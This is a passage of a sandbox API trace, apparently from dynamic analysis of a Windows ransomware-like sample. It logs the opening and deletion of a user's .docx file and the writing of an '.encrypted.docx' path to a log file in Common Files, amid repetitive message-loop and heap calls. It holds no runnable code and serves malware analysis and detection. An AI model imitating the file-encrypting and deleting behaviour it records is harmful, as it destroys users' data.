wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.824] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.825] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ulg-p8fths2s.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0035.825] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.825] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.825] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.825] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.825] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.825] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.826] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.826] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.826] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.826] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.826] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.826] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.826] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", lpFilePart=0x0) returned 0x60 [0035.827] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4208cb0, ftCreationTime.dwHighDateTime=0x1d5c2e7, ftLastAccessTime.dwLowDateTime=0xa51234c0, ftLastAccessTime.dwHighDateTime=0x1d5c200, ftLastWriteTime.dwLowDateTime=0x1510bae0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5920, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ulG-P8FTHS2s.docx", cAlternateFileName="ULG-P8~1.DOC")) returned 0x7c2100 [0035.827] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\ulg-p8fths2s.docx")) returned 1 [0035.828] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4208cb0, ftCreationTime.dwHighDateTime=0x1d5c2e7, ftLastAccessTime.dwLowDateTime=0xa51234c0, ftLastAccessTime.dwHighDateTime=0x1d5c200, ftLastWriteTime.dwLowDateTime=0x1510bae0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x5920, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ulG-P8FTHS2s.docx", cAlternateFileName="ULG-P8~1.DOC")) returned 0 [0035.828] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.828] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0035.828] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.829] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.829] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.829] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.829] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.829] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.829] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.829] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.830] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.830] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.830] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.830] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.830] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.830] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.830] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.830] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1b87, lpOverlapped=0x0) returned 1 [0035.831] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.831] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1b87, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.831] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.encrypted.docx\r\n", cchWideChar=109, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 109 [0035.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6d) returned 0x7db300 [0035.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.encrypted.docx\r\n", cchWideChar=109, lpMultiByteStr=0x7db300, cbMultiByte=109, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\ulG-P8FTHS2s.encrypted.docx\r\n", lpUsedDefaultChar=0x0) returned 109 [0035.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.831] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0035.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0035.831] WriteFile (in: hFile=0x140, lpBuffer=0x7db378*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db378*, lpNumberOfBytesWritten=0x6aee3c*=0x6c, lpOverlapped=0x0) returned 1 [0035.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0035.831] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.831] CloseHandle (hObject=0x140) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.832] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.833] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.833] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.833] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.834] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.834] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.834] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.834] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0035.834] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.834] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0035.835] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: 